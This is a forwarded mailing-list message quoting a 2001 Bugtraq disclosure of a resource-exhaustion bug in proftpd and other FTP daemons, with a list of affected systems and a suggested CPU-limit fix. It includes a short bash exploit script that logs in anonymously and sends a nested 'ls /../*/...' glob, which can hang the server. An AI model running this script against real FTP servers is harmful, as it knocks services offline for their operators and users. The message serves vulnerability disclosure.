Fwd: [bugtraq@securityfocus.com] Multiple-Vendor-FTP-Vuln. (old?)
I'm using proftpd 1.2.0pre10-2.0potato1, tried this vulnerability, and still affects to this version of proftpd.
I see that ftp://ftp.debian.org is still using this version, and I think also affected.
Thanks
Didit
------- Start of forwarded message -------
From: "Enrico Kern" <IphantomI@web.de>
To: bugtraq@securityfocus.com
Organization: http://freemail.web.de/
Subject: Multiple-Vendor-FTP-Vuln. (old?)
Date: 8/20/01 20:20:35
Hi,
i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
many new Linux-Dist.. When a user logged in in ftp and type
the ls command the in.ftpd takes over 90 percent cpu-usage and execute =
the command 2 or 3x than the full system hang up. it also works in =
console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ =
in march 01, but
it still works so i post it again.
affected:
RedHat Linux 7.x
Linux Mandrake 8.0
SuSE Linux 7.2
FreeBSD 4.3
AiX V 4.3
other?
Not vuln.:
latest Wu-Ftpd
Windows FTP-Server
Exploit:
#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20
Fix:
set cpu-limit for your anonymous user.
-------- End of forwarded message --------
Reply to: